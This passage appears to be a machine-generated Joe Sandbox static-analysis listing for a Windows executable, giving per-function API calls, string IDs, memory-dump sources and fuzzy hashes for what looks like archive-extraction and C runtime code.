                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CBC4D7
                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CBC4F1
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CBC509
                                                                                              • _swprintf.LIBCMT ref: 00CBC535
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00CBC548
                                                                                              • _swprintf.LIBCMT ref: 00CBC59C
                                                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 00CBC5AF
                                                                                                • Part of subcall function 00CBAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CBAF35
                                                                                                • Part of subcall function 00CBAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00CDE72C,?,?), ref: 00CBAF84
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                              • API String ID: 797121971-1840816070
                                                                                              • Opcode ID: c2139d1e313917de0da3ae223ca642ca64449a77da5192181aab2e79bc1e1624
                                                                                              • Instruction ID: 2039ee8dcdee20ba97ed0d6f6813b86e66fe937e1b33bf2c6d83e2d5a1d25bec
                                                                                              • Opcode Fuzzy Hash: c2139d1e313917de0da3ae223ca642ca64449a77da5192181aab2e79bc1e1624
                                                                                              • Instruction Fuzzy Hash: 4E917172648349BBE2219BA0CC89FFF77ACEB4A704F044819B749D6181D775AA049B73
                                                                                              Function 00CA6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA6FAA
                                                                                              • _wcslen.LIBCMT ref: 00CA7013
                                                                                              • _wcslen.LIBCMT ref: 00CA7084
                                                                                                • Part of subcall function 00CA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CA7AAB
                                                                                                • Part of subcall function 00CA7A9C: GetLastError.KERNEL32 ref: 00CA7AF1
                                                                                                • Part of subcall function 00CA7A9C: CloseHandle.KERNEL32(?), ref: 00CA7B00
                                                                                                • Part of subcall function 00CAA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00CA977F,?,?,00CA95CF,?,?,?,?,?,00CD2641,000000FF), ref: 00CAA1F1
                                                                                                • Part of subcall function 00CAA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CA977F,?,?,00CA95CF,?,?,?,?,?,00CD2641), ref: 00CAA21F
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00CA7139
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00CA7155
                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00CA7298
                                                                                                • Part of subcall function 00CA9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CA73BC,?,?,?,00000000), ref: 00CA9DBC
                                                                                                • Part of subcall function 00CA9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00CA9E70
                                                                                                • Part of subcall function 00CA9620: CloseHandle.KERNELBASE(000000FF,?,?,00CA95D6,?,?,?,?,?,00CD2641,000000FF), ref: 00CA963B
                                                                                                • Part of subcall function 00CAA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA501
                                                                                                • Part of subcall function 00CAA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA532
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                              • API String ID: 3983180755-3508440684
                                                                                              • Opcode ID: 1d00f28fc22adc76321cf538cb12a35aa507a97aa3cd8a38ba9fd949df6ef321
                                                                                              • Instruction ID: 08d419305b4f6166b7f805857684c725c2ca18e62bfc1db830bcec15feaf8c4f
                                                                                              • Opcode Fuzzy Hash: 1d00f28fc22adc76321cf538cb12a35aa507a97aa3cd8a38ba9fd949df6ef321
                                                                                              • Instruction Fuzzy Hash: 87C1F671D04646AEDB21DB74CD81FEEB3A8BF05308F04465AFA56E3282D734AB44DB61
                                                                                              Function 00CCD8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: __floor_pentium4
                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                              • API String ID: 4168288129-2761157908
                                                                                              • Opcode ID: 85b1fcd025239831112c49b44d9722d00c5055d17fe40108de23d307533e726b
                                                                                              • Instruction ID: acaf3d282290b71dd22dce5aa9a6266d9c423fa27db38f535bececcc449d75ea
                                                                                              • Opcode Fuzzy Hash: 85b1fcd025239831112c49b44d9722d00c5055d17fe40108de23d307533e726b
                                                                                              • Instruction Fuzzy Hash: 11C23972E086288FDB25CE28DD40BEAB7B5EB45305F1541EED85EE7240E775AE818F40
                                                                                              Function 00CA32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog_swprintf
                                                                                              • String ID: CMT$h%u$hc%u
                                                                                              • API String ID: 146138363-3282847064
                                                                                              • Opcode ID: 552cb854b13f992f3733774ef04c7730c1b3f33d69b88a7c1a9409d0b5656a0e
                                                                                              • Instruction ID: ad406c9547fbff3279ae05189fdabb5fb500e573eeb3ac8959e3e61a05839249
                                                                                              • Opcode Fuzzy Hash: 552cb854b13f992f3733774ef04c7730c1b3f33d69b88a7c1a9409d0b5656a0e
                                                                                              • Instruction Fuzzy Hash: 5832F8715103869FDF14DF74C8A5AE93BA5AF16308F08047DFD9A8B283DB749A49CB60
                                                                                              Function 00CA286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA2874
                                                                                              • _strlen.LIBCMT ref: 00CA2E3F
                                                                                                • Part of subcall function 00CB02BA: __EH_prolog.LIBCMT ref: 00CB02BF
                                                                                                • Part of subcall function 00CB1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CABAE9,00000000,?,?,?,0001046E), ref: 00CB1BA0
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CA2F91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                              • String ID: CMT
                                                                                              • API String ID: 1206968400-2756464174
                                                                                              • Opcode ID: 274f9fa9733736d25d105ce48a829e17c547c4fd505730aed28f7575b3aae032
                                                                                              • Instruction ID: 21d0624932639886989113e42201e11580dec51a4d9f7298c90350dc2869e111
                                                                                              • Opcode Fuzzy Hash: 274f9fa9733736d25d105ce48a829e17c547c4fd505730aed28f7575b3aae032
                                                                                              • Instruction Fuzzy Hash: 78624A715002968FDB19CF38C8957EA37A1EF56308F08457EFCAA8B283D7759A45CB60
                                                                                              Function 00CBF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CBF844
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00CBF910
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CBF930
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00CBF93A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 254469556-0
                                                                                              • Opcode ID: 245ad67ea0ae82be83ac1e40fd9e22694cc909971c62f8cb0ef73371c8f8863b
                                                                                              • Instruction ID: 2f71cf6470fd34a23f3ee7ab7b8892e2e8a314f073cb22a7f3a6e68f24debc68
                                                                                              • Opcode Fuzzy Hash: 245ad67ea0ae82be83ac1e40fd9e22694cc909971c62f8cb0ef73371c8f8863b
                                                                                              • Instruction Fuzzy Hash: D2312775D063199BDF21DFA4DD89BCCBBB8AF08304F1040AAE40CAB250EB719B859F45
                                                                                              Function 00CBE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(80000000,00CBE5E8,0000001C,00CBE7DD,00000000,?,?,?,?,?,?,?,00CBE5E8,00000004,00D01CEC,00CBE86D), ref: 00CBE6B4
                                                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00CBE5E8,00000004,00D01CEC,00CBE86D), ref: 00CBE6CF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoQuerySystemVirtual
                                                                                              • String ID: D
                                                                                              • API String ID: 401686933-2746444292
                                                                                              • Opcode ID: 584ec3f361e96e69f5b0fb248c969afa05c3379a8a7fb42fe37c3f51a3987e00
                                                                                              • Instruction ID: 59955b587bdf4f2769ab3a948b7085f11fcf9ea6b223ca72064e682746ba31c5
                                                                                              • Opcode Fuzzy Hash: 584ec3f361e96e69f5b0fb248c969afa05c3379a8a7fb42fe37c3f51a3987e00
                                                                                              • Instruction Fuzzy Hash: 89012B326001096BDF14DF29DC09BED7BAEEFC4324F0CC121ED29E7251DA38DA058680
                                                                                              Function 00CC8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00CC8FB5
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00CC8FBF
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00CC8FCC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID:
                                                                                              • API String ID: 3906539128-0
                                                                                              • Opcode ID: f920a7cfc3e8aacee4ffde55de3eb5a87c303eb1735d8e14a1b6a91b8768c62b
                                                                                              • Instruction ID: e173534787a22aeaaa0e87d60989fa1db3ed23d34f734c05cfc4eb8701a2a01d
                                                                                              • Opcode Fuzzy Hash: f920a7cfc3e8aacee4ffde55de3eb5a87c303eb1735d8e14a1b6a91b8768c62b
                                                                                              • Instruction Fuzzy Hash: 1D31C275901229ABCB21DF68DC89BDDBBB8AF48310F5041EAE41CA7250EB709F858F55
                                                                                              Function 00CCD440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                              • Instruction ID: c6284ee5487deb50fad0ebce37c42d731e55e94a319bc17cbcf416f86d01abfa
                                                                                              • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                              • Instruction Fuzzy Hash: 1502FC71E002199BDF14DFA9D980BADB7F1EF48314F25816EE91AE7384D731AA41CB90
                                                                                              Function 00CBAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CBAF35
                                                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,00CDE72C,?,?), ref: 00CBAF84
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: FormatInfoLocaleNumber
                                                                                              • String ID:
                                                                                              • API String ID: 2169056816-0
                                                                                              • Opcode ID: 420ee20afe06dc38b0ba399e2350d28c0c5d8a4c5ab884e937297fe6921e1abf
                                                                                              • Instruction ID: 2d67d9677fbc8055bee64332ed5e28888d5c95e43316d974a205c65810466b91
                                                                                              • Opcode Fuzzy Hash: 420ee20afe06dc38b0ba399e2350d28c0c5d8a4c5ab884e937297fe6921e1abf
                                                                                              • Instruction Fuzzy Hash: 9A015E7A200359AAD7109FA4DC45FAF77B8EF08710F015026FB1597250D3709915CBA6
                                                                                              Function 00CA6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00CA6DDF,00000000,00000400), ref: 00CA6C74
                                                                                              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00CA6C95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFormatLastMessage
                                                                                              • String ID:
                                                                                              • API String ID: 3479602957-0
                                                                                              • Opcode ID: 540ec87b02a9d069a4bc02da7f90ec5a75ed05c5d1dda172e492364c43090241
                                                                                              • Instruction ID: 72bf21c68f3580f77205353af29f44920c3faaa5dcfbf65244c4ed91bbc8f493
                                                                                              • Opcode Fuzzy Hash: 540ec87b02a9d069a4bc02da7f90ec5a75ed05c5d1dda172e492364c43090241
                                                                                              • Instruction Fuzzy Hash: 05D0C731345301BFFA110B614D06F1E7B59BF55B95F18C4057755D40E0D6749514A615
                                                                                              Function 00CD19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CD19EF,?,?,00000008,?,?,00CD168F,00000000), ref: 00CD1C21
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise
                                                                                              • String ID:
                                                                                              • API String ID: 3997070919-0
                                                                                              • Opcode ID: 4b00c7b19df80a82e286b6963e8d36df2a0d3a871de5f1556bb97e788a348217
                                                                                              • Instruction ID: 47d8e45faf2e8bb860e091777073412090d8adc0421020aafab85efc4d74d3d8
                                                                                              • Opcode Fuzzy Hash: 4b00c7b19df80a82e286b6963e8d36df2a0d3a871de5f1556bb97e788a348217
                                                                                              • Instruction Fuzzy Hash: D2B14E71220609AFD715CF28C486B657BE0FF45364F29865AE9AACF3A1C335DA91CB40
                                                                                              Function 00CBF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CBF66A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 2325560087-0
                                                                                              • Opcode ID: dd4b9f585de4fb4d01dc5f050ff473508cc9036a084e156099ebf8b6ebf9b307
                                                                                              • Instruction ID: ace4db2849967ba212ea7b737f1a511afa2d27beab67c363bef125fb521ddc1e
                                                                                              • Opcode Fuzzy Hash: dd4b9f585de4fb4d01dc5f050ff473508cc9036a084e156099ebf8b6ebf9b307
                                                                                              • Instruction Fuzzy Hash: 23519DB19016198FEB25CF94EC817AEBBF0FB48304F24846AD415EB391D7759A01CB60
                                                                                              Function 00CAB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(?), ref: 00CAB16B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
